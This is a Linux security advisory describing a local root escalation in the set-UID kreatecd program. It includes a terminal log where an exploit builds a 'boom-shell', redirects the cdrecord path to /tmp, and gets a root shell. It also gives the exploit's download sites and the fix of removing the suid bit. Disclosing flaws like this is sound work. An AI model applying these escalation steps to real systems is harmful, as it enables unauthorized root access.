|
Vulnerability kreatecd Affected Any system which has kreatecd installed as set-UID root Description Following is based on TESO Security Advisory. A vulnerability within the kreatecd application for Linux has been discovered. An attacker can gain local root-access. This affects any system which has kreatecd installed as set-UID root. This affects also a configure; make; make install procedure. Among the vulnerable distributions (if the package is installed) are the Halloween Linux Version 4 and SuSE 6.x. Tests: [stealth@liane stealth]$ stat `which kreatecd` File: "/usr/bin/kreatecd" Size: 229068 Filetype: Regular File Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Device: 3,1 Inode: 360053 Links: 1 Access: Tue Mar 14 14:48:21 2000(00000.00:00:45) Modify: Tue Mar 14 14:48:21 2000(00000.00:00:45) Change: Tue Mar 14 14:48:21 2000(00000.00:00:45) [stealth@liane stealth]$ id uid=500(stealth) gid=500(stealth) groups=500(stealth) [stealth@liane stealth]$ /tmp/kreatur (... some diagnostic messages ...) Creating suid-maker... Creating boom-shell... Execute kreatecd and follow the menus: Configure -> Paths -- change the path for cdrecord to /tmp/xxx Apply -> OK Configure -> SCSI -> OK Execute /tmp/boomsh BEHAVE! (poking around with GUI...) [stealth@liane stealth]$ /tmp/boomsh [root@liane stealth]# id uid=0(root) gid=500(stealth) groups=500(stealth) [root@liane stealth]# An attacker may gain local root-access to a system where vulnerable kreatecd package is installed. It might be difficult for an remote attacker who gained local user-access due to the GUI-nature of the vulnerable program. Kreatecd which runs with the saved user-id of 0 blindly trusts path's to cd-recording software given by unprivileged user. It then invokes this software with EUID of 0 when user just clicks a little bit around with the menus. The bug-discovery and the demonstration programs are due to S. Krahmer. There's a working demonstration program to exploit the vulnerability. The exploit is available from http://teso.scene.at/ or https://teso.scene.at/ http://www.cs.uni-potsdam.de/homepages/students/linuxer Solution The author and the distributor has been informed before. Remove the suid bit of kreatecd.